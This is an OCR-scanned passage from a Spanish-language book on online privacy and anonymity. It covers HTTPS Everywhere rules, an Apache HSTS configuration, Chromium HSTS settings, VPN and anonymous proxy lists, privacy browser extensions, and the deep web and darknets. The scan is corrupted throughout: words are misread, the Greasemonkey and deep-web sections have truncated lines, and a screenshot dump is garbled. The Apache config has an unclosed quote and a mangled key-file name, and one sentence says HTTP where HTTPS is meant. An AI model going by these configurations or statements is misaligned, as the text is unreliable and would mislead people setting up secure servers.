reglas de sobreescritura son las que permiten definir los sitios que deben ser tratados sienipre con el 
maximo rigor posible utilizando HTTPS. Por ejemplo, suponiendo que se ha definido una regia en la 
extension “HTTPS Everywhere ” con el sitio “www.abcde.com”, cualquier peticion HTTP realizada 
contra dicho dominio sera transformada a “https://www.abcde.com’. 

A continuacion, se explica el procedimiento mediante el cual un usuario que utilice la extension 
HTTPS Everywhere puede crear sus propias reglas de redireccion. 

En primer lugar, se debe verificar que el sitio al que se desea navegar de forma segura, se encuentra 
incluido en el listado de sitios de HTTPS Everywhere. Dicho listado se puede consultar en: 
“Herramientas —> Complementos —* Extensiones —> HTTPS-Everywhere * Preferencias en 
dicha option apareceran los sitios que se encuentran activados y que seran tratados por HTTPS 
Everywhere. 


Preferencias de HTTPS Everywhere 


HTTPS Everywhere SSL Observatory _ _ 

^Que reglas de redireccion HTTPS deberian aplkarse? 



Puede aprender a escribir sus propias reglas (para anadir soporte para otros sitios 
web) aqui . 

Restablecer configuraciones predeterminadas De sactivar todo j 


Imogen 01.09: Reglas de redireccion HTTPS en la extension HTTPS Everywhere. 

El listado anterior incluye una serie de sitios web en Internet que suelen ser bastante visitados y a 
los que conviene visitar utilizando unicamente HTTP. En el caso de que el usuario quiera incluir 
algun sitio en la lista, es necesario crear un fichero XML en el que se debe definir un patron basado 
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en expresiones regulares para aplicarlo junto con la regia. Por ejemplo, en el hipotetico caso del sitio 
web “ abcde.com ” se puede crear el fichero abcde.xml con el siguiente contenido. 

I cruleset name="abcde"> 

<target host="abcde.com" /> 

<target host="www.abcde.com" /> 

<rule from=""http:" 

to="https:" /> 

1 </ ruleset> 

Este fichero debe estar incluido en el directorio de HTTPS Everywhere, el cual en un navegador web 
Firefox se encuentra ubicado en: 

<HOME_USER>/.mozilla/firefox/<PROFILE>/HTTPSEverywhereUserRules/. 

Una vez hecho esto, se debe reiniciar el navegador web y ftnalmente verificar que en el listado de 
I sitios habilitados de la extension se encuentra incluido este sitio. 



Imogen 01.10: Regia de redireccion incluida en HTTPS Everywhere. 


fc.1.2.5 Poh'ticas HSTS (Http Strict Transport Security) 

BUSTS es un mecanismo que obliga que los clientes y servidores establezcan su comunicacion y 
pnsaenor intercambio de datos utilizando un canal HTTPS seguro. Esto quiere decir que si existe 
aier tipo de problema a la hora de establecer el canal de comunicacion, como por ejemplo que 
ail ser. idor presente un certificado firmado por una entidad no fiable, la conexion sera interrumpida 
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automaticamente antes de que se proceda at intercambio de datos. Este nivel de seguridad adicional 
es bastante recomendable en sitios en Internet que realizan operaciones delicadas tales como 
comercios electronicos o banca en linea. 

Uno de sus principales objetivos es mitigar los ataques de MITM sobre SSL obligando a los clientes 
a utilizar unicamente conexiones cifradas con TLS/SSL y se encuentra soportado por los principales 
servidores web modemos, tales como Apache o NGINX. Por otro lado. navegadores a la altura de 
Firefox. Opera o Chromium soportan las cabeceras HTTP necesarias para obligar el uso de HSTS 
en el lado del cliente. Si un servidor web se encuentra correctamente configurado para soportar 
HSTS, todas las respuestas emitidas a los clientes contendran la cabecera HTTP “ Strict-Transport- 
Security ”, lo cual le indica al cliente que las peticiones que se realicen contra el servidor web deben 
utilizar un certificado valido y todas las conexiones se deben realizar utilizando el protocolo HTTPS 
unicamente. El comportamiento de los clientes que soportan la politica HSTS es bastante simple 
y muy efectivo ante ataques MITM ya que en primer lugar, se encargan de cambiar el esquema 
“http://" por “https://" de todos los enlaces que hacen referencia al servidor web con HSTS y en 
segundo lugar, es necesario que el certificado utilizado para la conexion venga firmado por una 
entidad de confianza para el cliente (autoridad de certificacion). 

A continuacion se explica como habilitar el mecanismo HSTS en un servidor web Apache y como 
configurar el navegador web para ajustar el uso de HSTS segun las necesidades del usuario. 

HSTS en servidores web Apache 

Habilitar HSTS en un servidor web Apache es algo que inicialmente puede parecer trivial, ya que 
solamente es necesario cargar el modulo “ headers ” y utilizar la directiva “ Header ” con el valor 
HSTS correspondiente, sin embargo, algo que hay que tener presente es que los navegadores web 
ignoran la cabecera “ Strict-Transport-Security ” si no hace parte de una conexion HTTPS, esto 
significa que si un cliente realiza una peticion HTTP a un servidor y la respuesta de dicho servidor 
contiene la cabecera “ Strict-Transport-Security ”, dicha cabecera no tendra ningun valor para el 
cliente y sera ignorada, ya que los navegadores deben recibir la cabecera “ Strict-Transport-Security " 
en una conexion HTTPS para que la apliquen sobre el dominio en cuestion. 

Dicho esto, queda claro que habilitar HSTS es solamente una pequena parte de una configuracion 
segura, ya que sera necesario habilitar el modulo de SSL/TLS en un VirtualHost del servidor web. 
Las directivas de configuracion minimas que deberlan incluirse en un VirtualHost con SSL/TLS y 
HSTS habilitado se ensenan a continuacion: 

<VirtualHost *:443> . 

Header always set Strict-Transport-Security "max-age=63072000; includeSubDomams 
DocumentRoot "/opt/httpd-2•4. 10 /htdocs/hstsTesting 
SSLEngine on 

<Directory /opt/httpd—2.4.10/htdocs/hstsTesting> 

Options Indexes FollowSymLinks 
SSLRequireSSL 
</Directory> 

SSLCertificateFile /opt/httpd-2.4.10/Webserver .crt 
SSLCertificateKeyFile /opt/httpd-2.4.10/webserver. xey 
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<IfModule mime_module> 

AddType application/x-x509-ca-cert .crt 
AddType application/x-pkcs7-crl . crl 
</IfModule> 

</VirtualHost> 

Evidentemente las directivas anteriores se deben incluir en el fichero de configuracion de Apache y 
como se puede apreciar, unicamente definen una configuracion basica de SSL en el servidor web y la 
activacion de HSTS en las respuestas emitidas con la directiva “Header always set Strict-Transport- 
Security”. 


Si el cliente ingresa al sitio web utilizando HTTP o si existe cualquier problema con la conexion 
utilizando HTTPS, el intercambio de datos se interrumpe inmediatamente y el navegador web 
ensenara un mensaje como el que se muestra en la siguiente imagen. 

La conexion no es privada 

Es posible que los piratas informaticos esten intentando robar tu informacion de 
!por ejemplo, contrasenas, mensajes o tarjetas de credito). 


Cargo- de nuevo 


utiliza normalmente la encriptacion para proteger tu informadon. Cuando 
Chrome ha intentado establecer conexion con esta vez. el sitio web ha 

devuelto credenciales inusuales e incorrectas. Por tanto, es posible que un atacante este 
intentando suplantar la identidad de o que una pantalla de inicio de sesion Wi¬ 

Fi haya interrumpido la conexion. No obstante, tu informacion sigue estando protegida 
porque Chrome ha detenido la conexion antes de que se rntercambiaran datos. 

No puedes acceder a en este momento porque el sitio web utiliza hsts Los 

ataques y los errores de red suelen ser temporales, por lo que es probable que esta 
pagina funcione mas tarde. 


Imogen 01.11: Conexion HTTPS interrumpido por politico HSTS en el navegador web. 

En este caso concrete, los certificados utilizados por el servidor web no han sido emitidos por una 
entidad de confianza para el cliente y dado que el navegador web se encuentra configurado con 
N 1 ^ P ara sitio web en cuestion, la comunicacion entre el cliente y el supuesto servidor no puede 
continuar llevandose a cabo. Esto evita que se realicen ataques de “SSL Stripping ” con herramientas 
tan conocidas como SSLStrip y ademas, dado que el navegador interrumpe la conexion antes de 
cue se produzca el “ handshake ” correspondiente a la conexion SSL, no existe riesgo alguno para la 
informacion confidencial del cliente. 
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Por otro lado, desde el cliente tambien es posible habilitar este ~opt-m" de seguridad para 
determinados dominios, de tal forma que aunque el servidor no incluya explicitamente la cabecera 
estandar HSTS, el navegador por si solo bloqueara cualquier intento de conexion no segura, evitando 
problemas con el canal de comunicacion. Un buen ejemplo de configuracion de HSTS en el lado del 
cliente se encuentra en el navegador Chromium, el cual permite gestionar dominos personalizados 
que deben seguir la norma HSTS. Para entrar a esta interfaz de administration del navegador, es 
necesario ingresar a la siguiente ruta: chrome://net-intemals/#hsts 

Una vez alii, Chromium ensenara la interfaz que se puede ver en la siguiente imagen para la gestion 


de dominios con HSTS. 



HSTS is HTTPS Strict Transport Security: a way for sites to elect to always use HTTPS. See http://dev.chrpmium. 0 rfl/st 5 . 


Add domain 

Input a domain name to add it to the HSTS set 

Oomain: examptedomain.com 
Include subdomains for STS: tf 

Include subdomains for PKP: S3____. 

Public key fingerprints:__ _ _ 

fp ,Mclwfiwn>rinZcKC°mma^r°tedoMco'M'tfu*hcshFun^rolt°^tooror l steh*rill*M*64ir X oMfin l iMMtbre*<,m*'sl»l/Cuzek9VMUKeISlMS9gllvVtIg-) 

Hk) 

Delete domain 

Input a domain name to delete it from the HSTS set (you cannot delete preloaded entried). 

Domain: /.mvc Delete 
Query domain 

Input a domain name to query the current HSTS set 
Domain: {eJMmpiedoma ln.c om 1 Query j 

Found: 

domain: examp ledomain. cob 

static_upgrade_mode: unknown 
staticIstsJnclude_subdomains: 
static_pkp_include_subdomains: 
static_sts_observed: 
static_pkp_observed: 
static_spki_hashes: 
dynamic_upgrade_mode: strict 
dynamic_sts_include_subdomains: false 
dynamicj>kp_include_subdomains: false 
dynamic_sts_observed: I4i98ie3i8.699982 
dynamic_pkp_observed: I4i98ie3ia. 699995 
dynamic spki hashes: 


Imogen 01.12: Configuracion HSTS en Chromium. 


Si la configuracion anterior no se ha aplicado para un dominio concreto y aunque dicho dominio 
tenga HSTS habilitado, si las peticiones iniciales se realizan utilizando HTTP, aun cabe la posibihdad 
de realizar un ataque de “ hijacking ” o suplantacion. Por ejemplo, una configuracion bastante cornun 
consiste en redireccionar todo el trafico por HTTP a HTTPS, es decir, en el caso que el usuario 
solicite el sitio web “ http://example.com ”, automaticamente se realizara la redirection a ‘Tzr/ps:// 
example.com ” y dado que la petition inicial ha sido utilizando HTTP, aun existe la posibihdad de 
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llevar a cabo un ataque. Por este motivo, navegadores como Chromium y posteriormente otros 
como Firefox y Opera implementan un mecanismo conocido como “HSTS Preload List ” o lista 
de dominios HSTS precargada. Dicho mecanismo, como su nombre lo indica, carga una lista de 
dominios que deben cumplir con la normativa HSTS en el momento en el que el navegador arranca, 
de esta forma si el usuario solicita el recurso “http://example.com” la comunicacion automaticamente 
sera interrumpida, obligando al usuario a ingresar en la version segura con HTTPS. Para tener los 
valores adecuados en dicha lista, se utiliza un algoritmo de rastreo en busca de la cabecera HSTS 
en multiples sitios en Internet, ademas, cualquiera puede enviar una solicitud para que su sitio web 
sea incluido en dicha lista, la cual es compartida entre los navegadores web Chromium, Safari y 
Firefox. Para realizar dicha solicitud, basta con ingresar el dominio en cuestion en el siguiente sitio 
web: https://hstspreload.appspot.com/ 


1.1.2.6 Servicios VPN 

VPN (Virtual Private Network) es una tecnologia que permite crear conexiones privadas entre dos 
puntos utilizando una red publica como Internet. En ocasiones este tipo de redes funcionan como si 
de una red local se tratase, ya que solamente los integrantes de dicha red se pueden comunicar entre 
ellos aunque se encuentren en Internet. En la terminologia de las redes VPN, las conexiones entre 
dos puntos se les suelen llamar “tuneles”, ya que la conexion entre dos entidades no pasa por los 
canales de comunicacion convencionales y toda la comunicacion se encuentra recubierta por una 
capa de cifrado que impide que un tercero pueda ver o intervenir en la conexion. 

Tanto las soluciones VPN gratuitas como las de pago, se han convertido en un recurso bastante 
popular al problema de la privacidad y las rutinas de rastreo que implementan miles de sitios en 
Internet. Funcionalmente es una solucion simple y eficiente, ya que un servicio de VPN se encarga 
de cifrar todos los datos intercambiados entre origen y destino, asi como enrutar todas las peticiones 
del cliente por una direccion IP distinta a la suya. El beneficio de este tipo de servicios es evidente, 
ya que al ocultar la direccion IP del usuario, la eficacia de los sistemas de rastreo implementados por 
una empresa u organismo en Internet se vera bastante disminuida. Otra de las ventajas de utilizar un 
servicio VPN es que permite acceder a sitios en Internet que se encuentran bloqueados o censurados 
en el pais desde donde se realiza la solicitud, dado que el servicio VPN se encarga enrutar la petition 
al sitio web en cuestion utilizando una direccion IP perteneciente a un pais distinto. 

Como sepuede apreciar, existen variosbeneficiospara la privacidad alahorade utilizar un servicio VPN 
ynosolamenteesutilparanavegardeformasegurayprivadaporlntemet,sinoquetambienrepresentauna 
buena medida para la comunicacion directa con otros usuarios por medio del correo electronico o chats. 
A continuation se listan algunos de los servicios VPN gratuitos y de pago mas populares a la fecha 
de redactar este documento. 

FrootVPN 

Probablemente es uno de los mejores servicios VPN gratuitos que existen actualmente, ya que clama 
s-er una solucion completamente gratuita que provee altos niveles de privacidad por medio del cifrado 
de la information desde cualquier dispositivo directamente a la web. Ademas, no almacena logs 
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sobre las conexiones realizadas al interior de la VPN, respetando la pri\ acidad de sus usuarios. Por 
otro lado, se trata de una solucion que se puede utilizar en todos en dispositivos iOS y Android, asi 
como en sistemas operativos tales como Linux, Mac y Windows. El registro es gratuito y solamente 
tomara unos pocos segundos, asi que se recomienda su uso. 
https://www.frootvpn.com 

TunnelBear 

Se trata de una VPN que puede ser utilizada libremente aunque con ciertas restricciones. El plan 
gratuito de este servicio permite el intercambio de informacion en tuneles cifrados por medio de 
la VPN de hasta 500MB al mes y es posible llegar a 1GB al mes colaborando en la promocion de 
TunnelBean en Twitter. Una de las ventajas de esta VPN, es que cuenta con varias aplicaciones para 
dispositivos con Android, iOS, ordenadores personales y Mac. 
https://www.tunnelbear.com/ 

HideMan: 

Otra solucion VPN que cuenta con un plan gratuito con una restriction de 4 horas de acceso a la 
semana, sin embargo, a diferencia de otros servicios VPN de pago, los planes no son costosos. Esta 
solucion tambien soporta dispositivos Android, iOS y sistemas operativos Windows, Linux y Mac 
tanto en el plan gratuito como en los planes de pago. 

En el caso de utilizar este servicio en alguno de los planes de pago, no se registra la actividad del 
usuario ni se guardan los logs de acceso, sin embargo, en el plan gratuito, se reservan el derecho 
de almacenar los logs de acceso durante 14 dias en un servidor dedicado. Dicha informacion es 
analizada y utilizada solo en caso de que durante ese tiempo existan reclamaciones relacionadas con 
fraudes, carding, spam o distribution de pomografia infantil, una vez pasados los 14 dias, los logs 
son eliminados. 
https://www.hideman.net 

HideMyAss 

Se trata de un servicio VPN que adicionalmente permite la navegacion privada y segura en Internet 
por medio de un proxy anonimo que soporta conexiones seguras con HTTPS. Cuenta con varias 
caracteristicas muy interesantes, como la posibilidad de establecer la ubicacion desde la que 
supuestamente se realizan las peticiones a un sitio web, enmascarando de esta forma los detalles 
basicos sobre la ubicacion real del usuario. 
https://www.hidemyass.com 

ZenMate Security and Privacy VPN 

En este caso, ZenMate es una solucion VPN que cuenta con un plugin para navegadores tales como 
Chrome, Firefox, Safari y Opera. Permite enrutar todas las peticiones a sitios web por medio de su 
VPN y ademas, se encarga de cifrar la comunicacion entre el emisor y receptor. La extension de 
ZenMate no solamente permite el cifrado de la informacion, sino que tambien permite seleccionar 
el supuesto origen de las peticiones, de esta forma se consigue evadir restricciones relacionadas 
con la ubicacion geografica del usuario. La lista que ensena la extension de ZenMate se encuentra 
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ordenada ascendentemente por aquellos servidores que estan mas cerca de la ubicacion del usuario, 
de tal forma que se pueda utilizar cualquiera de ellos sin afectar demasiado la velocidad y la latencia 
de las peticiones del cliente y las respuestas del servidor objetivo. 
https://zemnate.com/ 

1.1.2.7 Servidores proxy anonimos 

Un servidor proxy es una solucion que entra en la categoria de “ middleware ”, el cual funciona como 
una pasarela entre el cliente y un destino en Internet, enrutando las peticiones y las respuestas de 
forma transparente para ambos. Un proxy puede ocultar la direccion IP del cliente, ya que el destino 
solamente vera la direccion IP del proxy y gracias a este concepto tan simple, se han construido 
soluciones muy robustas y potentes como Tor, una red anonima muy conocida que permite la 
navegacion anonima en Internet. 

En la actualidad existen muchos servicios que supuestamente brindan anonimato y permiten evadir 
multiples restricciones a la hora de navegar por sitios en Internet y aunque son soluciones muy 
utilizadas, es importante tener en cuenta que muchos de estos servicios implementan rutinas que no 
favorecen la privacidad de sus usuarios y en algunos casos pueden ser maliciosas. Un servidor proxy 
recibe y procesa informacion desde una position bastante ventajosa, ya que tiene la posibilidad de 
capturar y manipular los datos de la peticiones y respuestas correspondientes a la comunicacion 
entre un cliente y un sitio web. 

La situation es aun mas grave cuando se transmite informacion sensible entre el cliente y el 
destino, ya que si el servidor proxy aplica rutinas de captura y analisis de paquetes, podra obtener y 
almacenar dicha informacion. Aun asi, un proxy anonimo puede ser util para evadir ciertos filtros y 
acceder a contenidos a los que no se podria acceder utilizando una conexion directa. Si el objetivo 
es utilizar un proxy anonimo unicamente para acceder a contenidos que no requieran el envio de 
informacion sensible, pueden representar una solucion rapida al problema de la censura o a las 
restriccionesimpuestas en un segmento de red. 

En internet existen varios listados de servidores proxy anonimos los cuales permiten ocultar la 
direccion IP real del cliente y navegar por sitios en Internet utilizando un proxy como pasarela. 
Algunos de estos servicios se listan a continuation, sin embargo es algo bastante facil de encontrar 
utilizando buscadores de uso frecuente. 

- Zend2 Proxy: https://zend2.com/ 

DontfilterUs: http://dontfilter.us/ 

- Kproxy: http://www.kproxy.com/ 

- IP-Address proxy list: http://www.ip-adress.com/proxy_list/ 

- Public proxy servers: http://www.publicproxyservers.com/proxy/listl .html 

- Proxies.by: http://www.proxies.by/proxy/ 

- 2Anonymousproxy: http://2anonymousproxy.com/ 

- Proxify: https://proxify.com/ 
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- Proxy.org: http://proxy.org/ 

- NinjaCloak: http://ninjacloak.com/ 

- Xrory: http://www.xroxy.com/proxylist.htm 

- Blewpass: http://www.blewpass.com/ 

1.1.2.8 Complementos en navegadores web 

Una de las herramientas mas potentes que tiene un usuario a su disposicion son los complementos 
y extensiones de los navegadores web. En el caso de Firefox, existe un conjunto bastante amplio 
de extensiones de todo tipo y para diversos fines, evidentemente en este caso concreto, resultan 
especialmente interesantes aquellos complementos que se encargan de brindar una capa de protection 
adicional a la privacidad y/o el anonimato del usuario. A continuation se ensenan algunos de dichos 
complementos y como protegen la information personal del usuario. 


Ghostery 

Se trata de uno de los complementos mas famosos en Mozilla Firefox por la forma en la que es capaz 
de detectar y bloquear “crtfc” y rastreadores. Una de las caracteristicas mas interesantes de Ghostery 
es que le permite al usuario visualizar el listado de los rastreadores detectados y le permite definir 
cuales rastreadores pueden continuar con su actividad y cuales deben ser bloqueados. 
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Imogen 01.13: Rastreadores detectados por Ghostery. 


La imagen 01.13 ensena el funcionamiento de Ghostery en Firefox. Como se puede ver, ensena todos 
los rastreadores detectados y se pueden bloquear o desbloquear. Para que el usuario tenga un mejor 
conocimiento sobre los rastreadores detectados y de esta forma, permitir o bloquear su actividad. 
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Ghostery permite obtener informacion sobre las empresas que estan detras de dichos rastreadores. 
Esta informacion se recolecta de forma anonima y en gran parte, gracias a los usuarios que activan 
“Ghostrank ". Por otro lado, para mejorar la calidad de la informacion sobre los rastreadores que 
reporta Ghostery, “ Ghostranh c” recolecta informacion sobre los rastreadores encontrados y los sitios 
web en los que se han encontrado. La informacion que recolecta se encuentra relacionada con los 
elementos propiamente dichos del rastreador, como cookies, espacios de almacenamiento en el 
navegador y las paginas en donde se encontraban, dicha utilidad solamente se encarga de enviar 
informacion sobre los rastreadores y bajo ningun concepto envia informacion personal del usuario 
o sus habitos de navegacion. 


Para ver la informacion que tiene Ghostery sobre los rastreadores detectados y recolectados basta 
con ingresar en el panel de configuracion de la herramienta en la seccion de “opciones” o ingresar 
en la siguiente URL: resource://firefox-at-ghostery-dot-com/ghostery/data/options.html. Como se 
puede ver en la imagen 01.14, en la seccion correspondiente a las opciones de bloqueo se pueden ver 
los rastreadores detectados por la herramienta y tambien se puede crear una lista blanca para permitir 
el funcionamiento de algunos de los rastreadores reportados. 
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Imagen 01.14: Geslion de restreadores y listas blancas en Ghostery’. 


Finalmente, en la seccion correspondiente a la configuracion avanzada de la herramienta, es posible 
personalizar su funcionamiento dependiendo de las necesidades concretas del usuario. Por ejemplo, 
es posible configurar las alertas que se produzcan cuando se detecte un rastreador, establecer si se 
desean aplicar actualizaciones de forma automatica y tambien, la opcion de exportar e importar estos 
detalles de configuracion para que puedan ser utilizados desde otro navegador que tenga instalada 
la extension. 
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Click and Clean 

Es una extension para Firefox que permite limpiar informacion que se almacena en el navegador 
web de forma facil y rapida. Los elementos que permite borrar de un solo click son: 

- Historial de sitios web visitados. 

- Cookies 

- Cache 
Sesiones activas 

- Preferencias de sitios web. 

Por otro lado, cuenta con otras funcionalidades interesantes, tales como la posibilidad de remover 
“Flash Cookies ” y ejecutar un comando o aplicacion personalizada cuando se cierre el navegador 
web. 



Imogen 01.15: Opciones de la extension Click&Clean. 

Tambien permite arrancar el navegador web en modo “incognito”, de tal forma que no se almacenara 
de forma permanente ningun dato almacenado por los sitios web, ya sea en forma de cookies u 
objetos LSO. 

Otra funcionalidad interesante de la extension es la posibilidad de ejecutar pruebas sobre el nivel de 
privacidad que tiene el usuario partiendo de la informacion que suministra el navegador web, esta 
funcionalidad es conocida como “Privacy Test ” y se encarga de realizar una peticion HTTP al sitio 
web http://www.hotcleaner.com/clickclean-app.html que corresponde al dominio del equipo que 
mantiene la extension. En dicho sitio web se realizan una serie de pruebas para intentar obtener datos 
de caracter personal del usuario que ha realizado la peticion. Finalmente, se ensenan unos resultados 
que pueden ser utiles para determinar si el usuario tiene unos buenos niveles de privacidad y algunos 
consejos que le pueden ayudar a mejorar sus habitos a la hora de navegar por Internet. 
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Imogen 01.16: Configuracion de la extension Click&Clean. 


1.1.2.9 Privacy Badger 

Se trata de un complemento desarrollado y mantenido por la EFF (Electronic Frontier Foundation ) 
v que permite bloquear los rastreadores de terceros cuando el usuario navega por Internet. Su 
funcionamiento es muy similar al de Ghostery, sin embargo tambien permite el bloqueo de “Ads” 
y bloquea de forma automatica cualquier elemento de rastreo sin el consentimiento del usuario, 
algo que en la mayoria de extensiones de este tipo, incluyendo Ghostery, es necesario configurar. 
Por ejemplo, si un anunciante carga su contenido en varios de los sitios web que visita el usuario 
y parece que se encuentra analizando su actividad, este complemento se encarga bloquear dicho 
contenido evitando que aparezca en el navegador web del usuario sin que tenga que realizar ningun 
tipo de configuracion. Se trata de una extension facil de instalar y que se encuentra disponible en la 
siguiente direction: https://www.eff.Org/privacybadger#what_is_privacy_badger 

Su funcionamiento de cara al usuario es bastante simple y consta de 3 estados, cuando el icono de 
Privacy Badger en el navegador es rojo, indica que la extension ha determinado que el sitio web 
isitado tiene uno o varios rastreadores. Si el icono es de color amarillo, indica que ha determinado 
que el sitio web tiene un rastreador pero que es fundamental para cargar el contenido de la pagina, en 
tal caso, la extension permite cargar el contenido pero bloquea las cookies. Finalmente, si el icono es 
ie color verde, el complemento no ha encontrado ningun rastreador el sitio web visitado. 
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Imogen 01.17: Detection de rastreadores en Privacy Badger. 


1.1.2.10 AdBlock Plus 

Se trata de una extension que permite bloquear rastreadores que intentan determinar los sitios 
que el usuario ha visitado por medio de “ads” en sitios web intrusivos. Se trata de una extension 
facil de instalar y configurar, como todas las extensiones en Firefox se puede descargar e instalar 
directamente desde el sitio web oficial de extensiones, concretamente en el siguiente enlace: https:// 
addons.mozilla.org/en-us/firefox/addon/adblock-plus/ 

1.1.2.11 NoScript 

Evita ataques del tipo “ client-side ” por medio de scripts maliciosos con Javascript. Esta extension 
intenta bloquear contenido Javascript y algunas etiquetas que puedan dar como resultado la 
ejecucion de codigo en el navegador web, de esta forma se protege la privacidad y se detienen 
actividades maliciosas. Una de las ventajas de esta extension es que puede ser configurada de forma 
granular, permitiendo aplicar reglas a todos sitios que el usuario visita y posteriormente declarar 
algunos sitios como confiables. Se encuentra disponible para su descarga en el sitio web oficial de 
extensiones de Firefox: https://addons.mozilla.org/en-US/firefox/downloads/latest/722/addon-722- 
latest.xpi?src=noscript.ownsite 

1.1.2.12 BetterPrivacy 

Se trata de una extension que brinda protection contra cookies de larga duration. Aquellas que 
intentan almacenar y recolectar information sensible sobre el usuario. Esta extension es util para 
identificar, informar y remover este tipo de cookies en el navegador web. Se encuentra disponible en 
el siguiente enlace: https://addons.mozilla.org/en-US/firefox/addon/betterprivacy/ 
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1.2.13 Greasemonkey 

extension que permite editar y personalizar la forma en la que los sitios web que el usuario 
ensenan informacion. Es una extension muy completa que permite crear “user scripts ”, que 
piezas de codigo en Javascript para realizar acciones concretas en funcion al sitio visitado por el 
o. Los scripts pueden ser creados directamente por el usuario o utilizar algunos de los muchos 
se encuentran publicados libremente y que pueden ser utilizados sin restricciones. Un sitio web 
el que se pueden encontrar una gran variedad de dichos scripts es http://userscripts.org/'. Para 
argar e instalar esta extension hay que dirigirse al siguiente enlace: https://addons.mozilla.org,'' 
^ 'firefox/addon/greasemonkey/ 


1.2 Redes anonimas y la web profunda 

*as soluciones mas potentes en el campo de la privacidad y el anonimato. son las redes 
nas y la posibilidad de acceder a servicios que solamente se encuentran disponibles dentro de 
redes. Actualmente existen algunas soluciones que son interesantes desde el punto de vista de 
acidad y el anonimato, pero tambien lo son desde el punto de vista tecnico, como es el caso de 
V>-P o Freenet. Se trata de las soluciones mas avanzadas y maduras que existen actualmente en 
I d campo del anonimato y la privacidad, en consecuencia tambien las que cuentan con mayor apoyo 
per parte de la comunidad de usuarios. Explicar los principales detalles tecnicos y funcionales de 
«H 2 S redes anonimas sera el principal objetivo de los proximos capitulos de este libro, pero antes 
■ c§ necesario explicar algunos conceptos basicos sobre lo que es y no es la web profunda, asi como 
■ sarrrien, algunos terminos que son importantes comprender. 

| 1 . 2.1 La web profunda 

|Ca los liltimos anos el termino “ deep web ’ se ha ido popularizando y extendiendo tanto entre la 
aidad hacker, como entre los usuarios comunes en Internet. No obstante son muchas las 
aisas erroneas sobre el termino “ deep web ”, ya que en muchas ocasiones se usa de forma 
dnta a otros terminos como “la web oscura” o “ dark web". 

1 primer lugar, cuando se habla de “ deep web ” se refiere principalmente a contenidos que no se 
entran indexados por los principales motores de busqueda en Internet y por este motivo, es 
al su localization o tan siquiera saber que estan alii. Pueden haber muchos motivos por los 
: un contenido determinado no sea indexado por buscadores tan populares como Google o Bing, 
embargo lo mas comun es que la decision de ignorar un contenido se deba a que se encuentra 
egido por una contrasena, se encuentra incluido alguna red virtual privada a las cuales no tienen 
lacceso los crawlers lanzados por los buscadores, o simplemente son contenidos tan antiguos y con 
aac pocas visitas, que son marcados como irrelevantes con el fin de que las consultas realizadas por 
jibs usuarios sean lo mas fiables y exactas. Tambien es posible que dichos contenidos se encuentren 
tados en buscadores, pero dadas sus caracteristicas, no suelen aparecer con los criterios de 
jueda convencionales utilizados por los usuarios. Dicho esto, la web profunda o “deep web ” 
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se refiere a contenidos que se encuentran en Internet pero que no se encuentran indexados por los 
motores de busqueda modemos o si lo estan, son sumamente diticiles de hallar. 

Por otro lado, el termino “dark web" se refiere a contenidos que no se pueden indexar dado que se 
encuentran protegidos por sus autores, los cuales se encargan de usar y compartir dichos contenidos 
en redes privadas/anonimas o en sitios web en Internet que se encuentran protegidos por contrasena. 
La finalidad de dichos contenidos suele ser desconocida y en algunos casos se trata simplemente 
de paginas web para la administracion de algun portal u algiin tipo de contemdo relacionado con 

actividades ilegales. 

Ahora bien, si el lector ha comprendido adecuadamente los parrafos anteriores, rapidamente entendera 
dos cosas: la primera es que los contenidos en la deep web son enormes, pero que actualmente no 
hay forma de medir de forma aproximada, ni mucho menos exacta, la cantidad de contenidos que 
conforman la web profunda. La segunda es que mucha de esta informacion solamente tiene sentido 



Imogen 01.18: Iceberg representando los contenidos de la web profunda. 


La imagen 01.18 es probablemente la mas utilizada cuando se habla de la web proftinda, sin embargo, 
tal como se ha comentado anteriormente, no es posible saber exactamente cuantos contenidos a 
conforman con lo cual dicha imagen no solamente es exagerada, sino sumamente desinformativa. No 
es posible medir, ni tan siquiera estimar con un margen de error aceptable el volumen de contenidos 
que existen en la deep web, ya que un alto porcentaje de ellos son desconocidos y otra parte no se 
encuentran disponibles todo el tiempo. 

Es probable que el lector haya visto esta imagen en varias ocasiones en sitios web en Internet o en 
otros medios en los que se repite de forma reiterada el mismo error sin tan siquiera aplicar el sentido 
comun y preguntar: En ese inmenso mar de informacion 6 que contenidos son realmente vahosos/ 
utiles? ^Cuales de dichos contenidos son publicos? ^Por que motivo los buscadores como Google 
deciden no indexar dichos contenidos? 
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Es importante aclarar que cuando un usuario crea una cuenta en cualquier servicio en Internet, 
existen paginas que no son indexadas y a las que solamente Ios propietarios de dichos contenidos 
tienen acceso. Dichas paginas solamente tienen valor para su propietario. pero no para cualquier 
otro usuario en Internet y evidentemente los buscadores no tienen la posibilidad de indexar dichos 
contenidos ya que para acceder a ellos es necesario estar autenticado. 

Es muy probable que dicha imagen y otras similares, respondan al interes de investigadores y 
analistas del “Big Data” en un esfuerzo por intentar centrar la atencion de empresas privadas u 
organizaciones publicas en este tipo de espacios con el objetivo de conseguir financiacion y realizar 
estudios e investigaciones, pero es importante aplicar un criterio objetivo y basarse en datos mucho 
mas precisos que los que ofrecen especulaciones como la imagen anterior. Dichos datos se pueden 
encontrar, por ejemplo, en el anuncio del ano 2014 de la Union Intemacional de Telecomunicaciones 
(UIT) con relation al numero de usuarios conectados a Internet. La cifra alcanza los 3.000 millones 
de usuarios conectados, de los cuales se estima que cerca de 900 millones utilizan Facebook, 
260 millones utilizan Twitter y Youtube consigue superar 1 billon de reproducciones de videos 
diariamente. 

Evidentemente, estas estadlsticas hablan de usuarios y una tremenda cantidad de trafico, algo que 
se encuentra directamente relacionado con los contenidos incluidos en Internet. Dadas estas cifras, 
resulta bastante dificil de creer que todos los contenidos que dan soporte a 3.000 millones de usuarios 
conectados, correspondan unicamente al 4% del numero total de contenidos en Internet. Dicho esto, 
se invita al lector a que saque sus propias conclusiones basandose en cifras y hechos reales, no en 
especulaciones. 


1.2.2 Darknets 

tl termino “ darknef se refiere a un subconjunto de la deep web que representa un espacio protegido 
por una red privada (VPN) o al que solamente un numero reducido de usuarios autorizados pueden 
acceder. Los contenidos no son indexados por ningun buscador en Internet, de hecho, en algunos 
casos las direcciones de los servicios que se encuentran disponibles en estas redes no son resolubles 
por medio de los mecanismos habituales (como por ejemplo con consultas DNS). Probablemente 
i Una de las darknets mas populates es Tor, la cual, para acceder a ella es necesario contar con el 
I piente de Tor que puede ser descargado gratuitamente desde el sitio web oficial del proyecto en 
aww.torproject.org. Ademas, para poder navegar por la darknet de Tor, se debe contar con las 
direcciones de los servicios ocultos a los que se desea acceder. 

Lna idea bastante extendida y generalizada es que redes como Tor son utilizadas mayoritariamente 
